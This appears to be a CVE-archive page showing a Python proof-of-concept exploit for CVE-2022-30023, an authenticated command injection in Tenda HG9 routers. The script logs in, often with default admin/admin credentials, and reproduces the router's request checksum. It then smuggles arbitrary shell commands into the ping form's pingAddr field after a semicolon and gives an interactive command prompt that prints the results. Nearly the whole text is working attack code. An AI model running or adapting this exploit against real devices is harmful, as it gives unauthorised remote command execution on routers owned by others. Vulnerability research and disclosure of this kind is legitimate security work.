4837 Total CVEs
26 Years
GitHub
Home / 2022 / CVE-2022-30023
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
import requests
import argparse
import re
from urllib.parse import urlencode, quote_plus


def parseArgs():
	parser = argparse.ArgumentParser(description='CVE-2022-30023 - Tenda HG9 Authenticated Command Injection By Thiago Pontes (Haniwa0x01)')
	parser.add_argument('-u', '--url', nargs='?', type=str, required=True, default='127.0.0.1', help='url address')
	parser.add_argument('-U', '--user', nargs='?', default='admin', required=True, help='Username to login to the Router')
	parser.add_argument('-P', '--password', nargs='?', default='admin', required=True, help='Password to login to the Router')
	args = parser.parse_args()
	return args


def hash(inputVal):
	i = 0
	csum = 0

	while i < len(inputVal):
		if (i+4) > len(inputVal):
			if i < len(inputVal):
				csum += (ord(inputVal[i]) << 24)
			if (i+1) < len(inputVal):
				csum += (ord(inputVal[i+1]) << 16)
			if (i+2) < len(inputVal):
				csum += (ord(inputVal[i+2]) << 8)
			break

		else:
			csum += (ord(inputVal[i]) << 24) + (ord(inputVal[i+1]) << 16) + (ord(inputVal[i+2]) << 8) + (ord(inputVal[i+3]))
			i += 4

	csum = (csum & 0xffff) + (csum >> 16)
	csum = csum&0xffff
	csum = (~csum)&0xffff

	return inputVal + "postSecurityFlag=" + str(csum)

def login(host, data):
	url = (host + "/boaform/admin/formLogin")
	req = requests.Session()
	data = (data)
	page = req.post(url, data=data)

	if "BroadBand Device Webserver" in page.text:
		print("[!]: Logged!")
		return req

	else:
		print("[!]: Not logged!!!")
		return "false"

def logout(host, req):
	url = (host + "/boaform/admin/formLogout")
	data = ("save=Logout&submit-url=%2Flogin.asp")
	req = req.post(url, data=data)


def exec(host, payload, req):
	url = (host + "/boaform/formPing")
	payload = {'pingAddr': f';{payload}', 'wanif':'65535', 'submit-url': '%2Fping.asp'}
	result = urlencode(payload, quote_via=quote_plus)
	res = result + "&"
	csum = hash(res)

	page = req.post(url, data=csum).text
	resp = re.findall(r"<body><pre>(.*)<form><input type=button value=", page, re.DOTALL)[0]
	print(resp)

'''
#   Exploit for CVE-2022-30023             #
#   - Thiago Pontes (Haniwa0x01)           #
'''
if __name__ == "__main__":
	args = parseArgs()
	username = args.user
	password = args.password
	url = args.url

	data = hash(f"username={username}&password={password}&save=Login&submit-url=%2Fadmin%2Flogin.asp&")
	s = login(url, data)

	if s == "false":
		print("[!]: Login Error")
	else:
		while True:
			try:
				cmd = input("[CMD]: ")
				exec(url, cmd, s)
			except (KeyboardInterrupt):
				logout(url, s)
				break